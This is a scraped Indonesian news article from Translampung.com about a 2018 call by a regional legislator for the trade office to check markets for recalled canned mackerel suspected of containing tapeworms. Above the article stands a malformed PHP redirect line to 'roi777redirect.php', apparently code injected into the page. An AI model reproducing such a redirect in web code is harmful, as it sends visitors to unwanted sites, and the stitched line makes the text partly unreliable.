header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); DPRD Minta Diskoprindag Tanggap Terkait Produk Kemasan Ikan Makarel Mengandung Cacing Pita -
DPRD Minta Diskoprindag Tanggap Terkait Produk Kemasan Ikan Makarel Mengandung Cacing Pita

TRANSLAMPUNG.COM, PANARAGAN- ‎Ketua Komisi B DPRD Kabupaten Tulangbawang Barat (Tubaba) Edison, Meminta kesigapan Pemkab Tubaba melalui Dinas Koprasi industri dan Perdagangan (Koprindag) untuk segera melakukan kroscek terhadap 27 produk ikan Makarel‎ yang diduga mengandung cacing pita dalam kemasan di pasaran.‎

Hal tersebut upaya memanimalisir konsumen masyarakat yang belum mengetahui ‎adanya cacing pita pada sejumlah kemasan ikan Makarel bermerk di pasaran baik indomart, Alfamart juga pasaran umum.

Menurut Edison, sejauh ini belum ada atau laporan ‎keluhan dari masyarakat yang terkena penyakit akibat menkonsumsi dari sejumlah produk tersebut, namun upaya langkah antisipasi dan menindak lanjuti adanya pemberitaan secara Nasional maka kami berharap terhadap Dinas Koprindag dapat tanggap dan melakukan monitoring pada produk tersebut di seluruh pasar se-Kabupaten.

“Dinas Koprindag harus segera turun korscek ke seluruh pasar, lebih baik mencegah ‎dari pada mengobati, pastinya jika masih didapat prodek tersebut beredar di pasaran kami DPRD akan panggil Dinas terkait berarti mereka tidak turun dan bekerja sebagaiman poksinya,” kata Ketua Komisi B Edison Terhadap Translampung.com Via telpon pada (29/3/2018) sekra pukul 11:14 WIB.

Sementara itu menanggapi hal tersebut Dinas Koprindag melalui ‎Kepala Bidang (Kabid) perdagangan Helmi mengatakan. Sejauh ini pihaknya belum mengetahui adanya informasi terkait 27produk ikan Makarel yang telah di tarik oleh pemerintah pusat.

“‎Saya belum tahu mas jika ada informasi penarikan produk tersebut, namun saya akan segera melakukan koordinasi dengan Kepala Dinas segera mungkin,” Imbuhnya. (Dirman)

News Reporter